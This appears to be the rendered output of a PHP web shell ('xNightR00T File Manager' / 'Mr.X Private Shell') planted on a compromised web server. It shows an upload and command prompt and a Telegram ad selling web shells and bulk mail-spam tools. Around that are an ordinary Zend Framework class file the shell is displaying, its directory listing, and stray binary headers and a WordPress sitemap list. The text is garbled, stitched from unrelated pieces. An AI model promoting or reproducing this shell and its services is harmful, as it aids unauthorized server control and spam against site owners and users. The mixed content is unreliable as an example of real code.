xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

require_once 'ZendX/Service/ZendServer/ApplicationInfo.php';

class ZendX_Service_ZendServer_ApplicationsList implements ArrayAccess, Iterator, Countable
{
    protected $_pointer = 0;

    protected $_apps = array();

    protected $_appIds = array();

    public function __construct(SimpleXMLElement $xml)
    {
        if ($xml->getName() != 'applicationsList') {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Unexpected base XML element: {$xml->getName()}");
        }

        $i = 0;
        foreach($xml->children() as $appXml) {
            $appInfo = new ZendX_Service_ZendServer_ApplicationInfo($appXml);
            $this->addApplication($appInfo);
        }
    }

    public function addApplication(ZendX_Service_ZendServer_ApplicationInfo $app)
    {
        $lastId = end($this->_appIds);
        if ($lastId === false) {
            $lastId = 0;
        } else {
            $lastId++;
        }

        $this->_apps[$lastId] = $app;
        $this->_appIds[$app->getId()] = $lastId;
    }

    /**
     * Get application by it's ID (this is sugar coatig around offsetGet())
     *
     * @param integer $id
     * @return ZendX_Service_ZendServer_ApplicationInfo
     */
    public function byId($id)
    {
        return $this->offsetGet($id);
    }

    /**
     * Iterator Interface Methods
     */

    public function current()
    {
        return $this->_apps[$this->_pointer];
    }

    public function key()
    {
        return $this->_appIds[$this->_pointer];
    }

    public function next()
    {
        $this->_pointer++;
    }

    public function offsetExists($offset)
    {
        return isset($this->_appIds[$offset]);
    }

    public function offsetGet($offset)
    {
        return ($this->_apps[$this->_appIds[$offset]]);
    }

    public function offsetSet($offset, $value)
    {
        require_once 'ZendX/Service/ZendServer/Exception.php';
        throw new ZendX_Service_ZendServer_Exception("Attempting to change a read-only list of applications");
    }

    public function offsetUnset($offset)
    {
        require_once 'ZendX/Service/ZendServer/Exception.php';
        throw new ZendX_Service_ZendServer_Exception("Attempting to change a read-only list of applications");
    }

    public function rewind()
    {
        $this->_pointer = 0;
    }

    public function valid()
    {
        return (isset($this->_apps[$this->_pointer]));
    }

    public function count()
    {
        return count($this->_apps);
    }
}

Filemanager

Name Type Size Permission Actions
ApplicationInfo.php File 5.19 KB 0644
ApplicationServer.php File 2.06 KB 0644
ApplicationsList.php File 2.51 KB 0644
Exception.php File 1.56 KB 0644
LibraryInfo.php File 4.25 KB 0644
LicenseInfo.php File 2.99 KB 0644
Message.php File 1.1 KB 0644
Response.php File 5.99 KB 0644
ServerInfo.php File 3.68 KB 0644
ServersList.php File 2.02 KB 0644
SystemInfo.php File 2.96 KB 0644
bootstrapResponse.php File 2.35 KB 0644
libraryVersion.php File 2.38 KB 0644
vhostInfo.php File 2.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml